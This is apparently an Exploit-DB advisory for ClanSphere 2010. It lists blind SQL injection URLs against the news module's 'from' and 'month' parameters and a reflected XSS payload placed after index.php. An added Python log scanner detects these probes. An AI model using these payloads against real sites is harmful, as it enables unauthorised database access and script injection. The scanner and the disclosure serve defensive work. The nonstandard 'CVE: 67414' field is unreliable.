ClanSphere 2010 - Multiple Vulnerabilities

EDB-ID: 14742

CVE: 67414

Author: Sweet

Type: webapps

Platform: PHP

Published: 2010-08-25

############################################################################
#                                                                          #
# Exploit Title: ClanSphere Multiple Vulnerabilities                       #
#                                                                          #
# Date: 24/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact: charif38@hotmail.fr                                             #
#                                                                          #
# Software Link:                                                           #
#                                                                          #
# Download: http://sourceforge.net/projects/clansphere/                    #
#                                                                          #
# Version: all                                                             #
#                                                                          #
# Tested on: WinXP SP3                                                     #
#                                                                          #
# Risk: HIGH                                                               #
#                                                                          #
# Description: ClanSphere offers some nice features for                    #
#                                                                          #
# you to easily set up and maintain your own clan site within minutes!     #
#                                                                          #
############################################################################

1- Blind SQL injection (in the "from" and "month" parameters of the news module):

http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+

http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+

2- XSS (via the path segment after index.php):

http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
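As an added, defender-side example (not part of the original advisory): a small Python log scanner that parses Apache combined-format access log lines and flags requests carrying the two probe shapes shown above, the quote plus AND-comparison plus comment marker used in the blind SQL injection URLs and the script tag in the XSS URL. The log lines are constructed; the URL shapes, parameter names and payloads come from the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample lines in Apache "combined" format (not real traffic): the
# advisory's two probe URLs as a browser would encode them, plus one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Aug/2010:21:14:02 +0200] "GET /clansphere/index.php?mod=news&action=recent&id=0&from=list%27+and+31337-31337%3D0+--+ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Aug/2010:21:14:09 +0200] "GET /clansphere/index.php/%3E%22%3E%3CScRiPt%3Ealert(%22sweet%22)%3C/ScRiPt%3E HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2010:21:15:30 +0200] "GET /clansphere/index.php?mod=news&action=recent&year=2009&month=8 HTTP/1.1" 200 6020 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Boolean-based probe shaped like the advisory's: a quote closing the string
# literal, an AND/OR comparison, then a comment marker that discards the rest.
SQLI_RE = re.compile(r"""['"]\s*\b(and|or)\b\s+[\w'"\-]+\s*=\s*[\w'"\-]+.*(--|#)""", re.IGNORECASE)
# Reflected-XSS probe: a script tag anywhere in the decoded input, any letter case.
XSS_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def classify_uri(uri):
    """Return finding labels ("sqli", "xss") for one raw request URI, or []."""
    decoded = unquote_plus(uri)              # '+' -> space, %xx -> char; undoes the URL encoding
    path, _, query = decoded.partition("?")  # split by hand so a decoded '#' is not read as a fragment
    # Inspect the path as well as each query value: the XSS probe on the page
    # lives in the PATH_INFO segment after index.php, not in a parameter.
    candidates = [path] + [v for _, v in parse_qsl(query, keep_blank_values=True)]
    findings = []
    for text in candidates:
        for label, pattern in (("sqli", SQLI_RE), ("xss", XSS_RE)):
            if pattern.search(text) and label not in findings:
                findings.append(label)
    return findings


def scan_log(text):
    """Return [(client_ip, findings)] for every line whose request carries a probe."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                         # unparseable line: skip rather than guess
        findings = classify_uri(m.group("uri"))
        if findings:
            hits.append((m.group("ip"), findings))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the two probe requests from 203.0.113.5 and leaves the benign "month=8" request alone.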


Enjoy your iftar, and 1, 2, 3, long live Algeria :))